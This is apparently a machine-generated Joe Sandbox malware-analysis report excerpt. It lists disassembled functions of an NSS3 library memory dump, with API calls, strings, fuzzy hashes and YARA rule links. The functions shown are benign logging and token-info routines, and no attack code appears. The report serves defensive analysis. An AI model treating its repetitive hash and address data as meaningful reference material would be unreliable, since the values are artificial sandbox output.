PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C7B7929), ref: 6C792FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C7B7929), ref: 6C792FE0

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: cbfc70e153abecf56feeb191dadab0d8fb197a86472d066fa9da672f7989fc13
Instruction ID: 210cc3d7b97b098d3f06ebf31bbaec69ebcd0e211483e4f83f7ef6fa2b762cd7
Opcode Fuzzy Hash: cbfc70e153abecf56feeb191dadab0d8fb197a86472d066fa9da672f7989fc13
Instruction Fuzzy Hash: CA513171A049118FDB10CE5DEA84B6A77B3FF44328F294239D90E9BB12D735E842CB80

Function 6C6D4DB0 Relevance: 2.8, Strings: 2, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C6D5125
/G6/, xrefs: 6C6D4DC2

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID:
String ID: /G6/$winUnlockReadLock
API String ID: 0-275802210
Opcode ID: 0d0f13661685de9590b776eb5e8dbcc490883e75c4fbbe01356468cbcbf5a18d
Instruction ID: 8c2cdd6ed91e9667c1d829bfc5476a73c3c3b199b0e7eaf9bb1ba6bd01f9e202
Opcode Fuzzy Hash: 0d0f13661685de9590b776eb5e8dbcc490883e75c4fbbe01356468cbcbf5a18d
Instruction Fuzzy Hash: 3EE13DB0A083409FDB55DF29D48465ABBF0FFC9308F11862DF88997251EB74A985CBC6

Function 6C75A820 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

/G6/, xrefs: 6C75A829
[[tl, xrefs: 6C75A92D, 6C75A943

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID:
String ID: /G6/$[[tl
API String ID: 0-2434547440
Opcode ID: fa1a3efc600a28de02527a01574d101f77e2ceb726a8587659e1afb593a49520
Instruction ID: 530f0a561749ef1de39a206e8bc2374e3ba36997a18f9b4aab3af2f8588a1ac1
Opcode Fuzzy Hash: fa1a3efc600a28de02527a01574d101f77e2ceb726a8587659e1afb593a49520
Instruction Fuzzy Hash: 4D517DB1A012198FDB05CF15DA44BAA7BE5FF49318F66807DE8199B750DB30E861CBA0

Function 6C79ED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C79EE3D

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 101b4ae7387b53b665bb8539e2db99d4d0aaecb70c599f39c633a658a0c33cc8
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: 6571D572E017098FE718CF59EA8076AB7F2BF88304F15462ED85A97B91D770E940CB91

Function 6C708960 Relevance: .4, Instructions: 381COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 479b8d2f213f65b1b536ab0ea025c35109ca1eff46ca7d7c516c56307c097544
Instruction ID: 233796aaece62a2b5c20e6b7d7bdab932d1b9fe837e8fac5c6be06636ff1f9d0
Opcode Fuzzy Hash: 479b8d2f213f65b1b536ab0ea025c35109ca1eff46ca7d7c516c56307c097544
Instruction Fuzzy Hash: 2ED17BB1F0521A8FDB48CEA9C6816AFB7F2FB89304F25857AC556E7A41D7309C41CB90

Function 6C738EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89e2b0019a85bbee55f6d86ea56fe93a027aa9aa36171bf70405ab96c5c62ac9
Instruction ID: 7aedd5bfedccfa462954b6ffc02c96ac05c8e990d201a087adeb6d904a2a7461
Opcode Fuzzy Hash: 89e2b0019a85bbee55f6d86ea56fe93a027aa9aa36171bf70405ab96c5c62ac9
Instruction Fuzzy Hash: 37119072A012258FD714CF25D98475AB7A5BF8231CF04527BD8198FA82C775D886C7C1

Function 6C810C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 075543ad1de9d8ded336b60bb81a7742cad8eded69e2b023e89c6df62c18494c
Instruction ID: 420f25442230a7c3c4557c8e386ee11b8b1a00d69420e286fc4423f177d772f8
Opcode Fuzzy Hash: 075543ad1de9d8ded336b60bb81a7742cad8eded69e2b023e89c6df62c18494c
Instruction Fuzzy Hash: 1511C17470834A9FCB20DF18D8806AA77E1FF85368F148579D81A8BB01DB31E816CBA1

Function 6C810D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 182a45a63661f3416dacb66aa2fa676ce4479b4731304aa1017de83a415b8499
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 10E0223A21A016A7CB248E48C900AA93398DF8161AFB4897ECC0D9FE01D733F8138780

Function 6C73CC60 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6a27d4c9ce061092f1f9688e4fafeb7a7cb6a537079f4cfd5709dc2a7699560
Instruction ID: 4dd0b0c12c2afb2ba807c9b48e53b8af3bb8b90c1695f2ed6d601b51e55d7ee1
Opcode Fuzzy Hash: e6a27d4c9ce061092f1f9688e4fafeb7a7cb6a537079f4cfd5709dc2a7699560
Instruction Fuzzy Hash: 2BC04838244608CFCB44DA49E4899A83BA8AB8961070400A4EA028B722DB21F800DA80

Function 6C8509D0 Relevance: 63.3, APIs: 33, Strings: 3, Instructions: 275filetimethreadCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C850A22

Part of subcall function 6C809DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C850A27), ref: 6C809DC6
Part of subcall function 6C809DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C850A27), ref: 6C809DD1
Part of subcall function 6C809DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C809DED

PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C850A35

Part of subcall function 6C733810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C73382A
Part of subcall function 6C733810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C733879

PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C850A66
PR_GetCurrentThread.NSS3 ref: 6C850A70
PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C850A9D
PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C850AC8
PR_vsmprintf.NSS3(?,?), ref: 6C850AE8
EnterCriticalSection.KERNEL32(?), ref: 6C850B19
OutputDebugStringA.KERNEL32(00000000), ref: 6C850B48
OutputDebugStringA.KERNEL32(?), ref: 6C850B88
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C850C36
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850C45
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C850C5D
_PR_MD_UNLOCK.NSS3(?), ref: 6C850C76
PR_LogFlush.NSS3 ref: 6C850C7E
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C850C8D
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850C9C
OutputDebugStringA.KERNEL32(?), ref: 6C850CD1
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C850CEC
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850CFB
OutputDebugStringA.KERNEL32(00000000), ref: 6C850D16
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C850D26
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850D35
OutputDebugStringA.KERNEL32(0000000A), ref: 6C850D65
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C850D70
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850D7E
_PR_MD_UNLOCK.NSS3(?), ref: 6C850D90
free.MOZGLUE(00000000), ref: 6C850D99

Strings

%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - , xrefs: 6C850A5B
/G6/, xrefs: 6C8509DC
%ld[%p]: , xrefs: 6C850A96

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: DebugOutputStringfflush$Timefwrite$Unothrow_t@std@@@__ehfuncinfo$??2@$R_snprintfSystem$CriticalCurrentEnterExplodeFileFlushR_vsmprintfR_vsnprintfSectionThreadfputcfreememcpy
String ID: %04d-%02d-%02d %02d:%02d:%02d.%06d UTC - $%ld[%p]: $/G6/
API String ID: 3820836880-3598756620
Opcode ID: f48ae10bf1104e80fd5277c85ead1d1789e225b73e600acd5fc13da888907efe
Instruction ID: bd893d6f83238f1c4ee26c90897859e8415f2474d45036b14e3f1035ecba0dc9
Opcode Fuzzy Hash: f48ae10bf1104e80fd5277c85ead1d1789e225b73e600acd5fc13da888907efe
Instruction Fuzzy Hash: 4DA1E574A00154DFDF309F68DD88BAA3B78AF1231DF480A74E80593652D7B5AD54CB91

Function 6C7728A0 Relevance: 49.2, APIs: 12, Strings: 16, Instructions: 155COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetTokenInfo), ref: 6C7728BD
PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6C7728EF

Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(?), ref: 6C850B88
Part of subcall function 6C8509D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C850C5D
Part of subcall function 6C8509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C850C8D
Part of subcall function 6C8509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850C9C
Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(?), ref: 6C850CD1
Part of subcall function 6C8509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C850CEC
Part of subcall function 6C8509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850CFB
Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C850D16
Part of subcall function 6C8509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C850D26
Part of subcall function 6C8509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850D35
Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C850D65
Part of subcall function 6C8509D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C850D70
Part of subcall function 6C8509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C850D90
Part of subcall function 6C8509D0: free.MOZGLUE(00000000), ref: 6C850D99

Part of subcall function 6C730F00: PR_GetPageSize.NSS3(6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F1B
Part of subcall function 6C730F00: PR_NewLogModule.NSS3(clock,6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F25

PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C7728D6

Part of subcall function 6C8509D0: PR_Now.NSS3 ref: 6C850A22
Part of subcall function 6C8509D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C850A35
Part of subcall function 6C8509D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C850A66
Part of subcall function 6C8509D0: PR_GetCurrentThread.NSS3 ref: 6C850A70
Part of subcall function 6C8509D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C850A9D
Part of subcall function 6C8509D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C850AC8
Part of subcall function 6C8509D0: PR_vsmprintf.NSS3(?,?), ref: 6C850AE8
Part of subcall function 6C8509D0: EnterCriticalSection.KERNEL32(?), ref: 6C850B19
Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C850B48
Part of subcall function 6C8509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C850C76
Part of subcall function 6C8509D0: PR_LogFlush.NSS3 ref: 6C850C7E

PR_LogPrint.NSS3( label = "%.32s",?), ref: 6C772963
PR_LogPrint.NSS3( manufacturerID = "%.32s",?), ref: 6C772983
PR_LogPrint.NSS3( model = "%.16s",?), ref: 6C7729A3
PR_LogPrint.NSS3( serial = "%.16s",?), ref: 6C7729C3
PR_LogPrint.NSS3( flags = %s %s %s %s,CKF_RNG,CKF_WRITE_PROTECTED,CKF_LOGIN_REQUIRED,?), ref: 6C772A26
PR_LogPrint.NSS3( maxSessions = %u, Sessions = %u,?,?), ref: 6C772A48
PR_LogPrint.NSS3( maxRwSessions = %u, RwSessions = %u,?,?), ref: 6C772A66
PR_LogPrint.NSS3( hardware version: %d.%d,?,?), ref: 6C772A8E
PR_LogPrint.NSS3( firmware version: %d.%d,?,?), ref: 6C772AB6

Strings

firmware version: %d.%d, xrefs: 6C772AB1
manufacturerID = "%.32s", xrefs: 6C77297E
label = "%.32s", xrefs: 6C77295E
hardware version: %d.%d, xrefs: 6C772A89
pInfo = 0x%p, xrefs: 6C7728EA
flags = %s %s %s %s, xrefs: 6C772A21
CKF_RNG, xrefs: 6C772A13, 6C772A20
slotID = 0x%x, xrefs: 6C7728D1
maxRwSessions = %u, RwSessions = %u, xrefs: 6C772A61
maxSessions = %u, Sessions = %u, xrefs: 6C772A43
serial = "%.16s", xrefs: 6C7729BE
CKF_LOGIN_REQUIRED, xrefs: 6C7729F3, 6C772A1E
C_GetTokenInfo, xrefs: 6C7728B8
CKF_USER_PIN_INIT, xrefs: 6C7729E5
model = "%.16s", xrefs: 6C77299E
CKF_WRITE_PROTECTED, xrefs: 6C7729FE, 6C772A1F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Print$DebugOutputString$fflushfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushModulePageR_vsmprintfR_vsnprintfSectionSizeThreadTimefputcfreememcpy
String ID: firmware version: %d.%d$ flags = %s %s %s %s$ hardware version: %d.%d$ label = "%.32s"$ manufacturerID = "%.32s"$ maxRwSessions = %u, RwSessions = %u$ maxSessions = %u, Sessions = %u$ model = "%.16s"$ pInfo = 0x%p$ serial = "%.16s"$ slotID = 0x%x$CKF_LOGIN_REQUIRED$CKF_RNG$CKF_USER_PIN_INIT$CKF_WRITE_PROTECTED$C_GetTokenInfo
API String ID: 2460313690-1106672779
Opcode ID: 573bd457b76c5c2b0e293c4a130ccd2ec436cc1cffa31a95dfccf019da96730d
Instruction ID: 00c29f2cd5059e99cb6b6b2883c3c60576f24498937a80172a09a39884e70b7a
Opcode Fuzzy Hash: 573bd457b76c5c2b0e293c4a130ccd2ec436cc1cffa31a95dfccf019da96730d
Instruction Fuzzy Hash: 6D51F9B1601148DFEF308B95DF8DA5937A5AB4220DF858475EC199BB17EB31EC04CBA1

Function 6C756BF0 Relevance: 49.1, APIs: 19, Strings: 9, Instructions: 148COMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(6C890148,?,?,?,?,6C756DC2), ref: 6C756BFF
PR_smprintf.NSS3(%s manufacturerID='%s',00000000,?,6C756DC2), ref: 6C756C1C

Part of subcall function 6C72C5E0: free.MOZGLUE(?,?,?,?,00000000,00000001,?,6C731FBD,Unable to create nspr log file '%s',00000000), ref: 6C72C63B

free.MOZGLUE(00000000,?,?,?,6C756DC2), ref: 6C756C27
PR_smprintf.NSS3(%s libraryDescription='%s',00000000,?,6C756DC2), ref: 6C756C45
free.MOZGLUE(00000000,?,?,?,6C756DC2), ref: 6C756C50
PR_smprintf.NSS3(%s cryptoTokenDescription='%s',00000000,?,6C756DC2), ref: 6C756C71
free.MOZGLUE(00000000,?,?,?,6C756DC2), ref: 6C756C7C
PR_smprintf.NSS3(%s dbTokenDescription='%s',00000000,?,6C756DC2), ref: 6C756C9D
free.MOZGLUE(00000000,?,?,?,6C756DC2), ref: 6C756CA8
PR_smprintf.NSS3(%s cryptoSlotDescription='%s',00000000,?,6C756DC2), ref: 6C756CC9
free.MOZGLUE(00000000,?,?,?,6C756DC2), ref: 6C756CD4
PR_smprintf.NSS3(%s dbSlotDescription='%s',00000000,?,6C756DC2), ref: 6C756CF5
free.MOZGLUE(00000000,?,?,?,6C756DC2), ref: 6C756D00
PR_smprintf.NSS3(%s FIPSSlotDescription='%s',00000000,?,6C756DC2), ref: 6C756D1D
free.MOZGLUE(00000000,?,?,?,6C756DC2), ref: 6C756D28
PR_smprintf.NSS3(%s FIPSTokenDescription='%s',00000000,?,6C756DC2), ref: 6C756D45
free.MOZGLUE(00000000,?,?,?,6C756DC2), ref: 6C756D50
PR_smprintf.NSS3(%s minPS=%d,00000000,?,6C756DC2), ref: 6C756D68
free.MOZGLUE(00000000,?,?,?,6C756DC2), ref: 6C756D73

Strings

%s manufacturerID='%s', xrefs: 6C756C17
%s libraryDescription='%s', xrefs: 6C756C40
%s dbSlotDescription='%s', xrefs: 6C756CF0
%s minPS=%d, xrefs: 6C756D63
%s cryptoTokenDescription='%s', xrefs: 6C756C6C
%s FIPSTokenDescription='%s', xrefs: 6C756D40
%s FIPSSlotDescription='%s', xrefs: 6C756D18
%s cryptoSlotDescription='%s', xrefs: 6C756CC4
%s dbTokenDescription='%s', xrefs: 6C756C98

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: R_smprintffree
String ID: %s FIPSSlotDescription='%s'$%s FIPSTokenDescription='%s'$%s cryptoSlotDescription='%s'$%s cryptoTokenDescription='%s'$%s dbSlotDescription='%s'$%s dbTokenDescription='%s'$%s libraryDescription='%s'$%s manufacturerID='%s'$%s minPS=%d
API String ID: 657075589-3414793728
Opcode ID: 9219ec932ab74595fef854bd3e329d4dfa517aafc5e5007dc515288909d73a51
Instruction ID: dbef4080b3e26cdaa66ffc46a35dc9f3a9aee5e10a2a71cde92c7755e27775a3
Opcode Fuzzy Hash: 9219ec932ab74595fef854bd3e329d4dfa517aafc5e5007dc515288909d73a51
Instruction Fuzzy Hash: 9841C5F660255127BB206A295E0ECA73A589ED15DC7690530FC1DC7F01FE22CE2593EA

Function 6C730AA0 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 227libraryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C730AD4

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

PR_EnterMonitor.NSS3 ref: 6C730B0D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6C730B2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6C730B54
WideCharToMultiByte.KERNEL32 ref: 6C730B94
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C730BC9
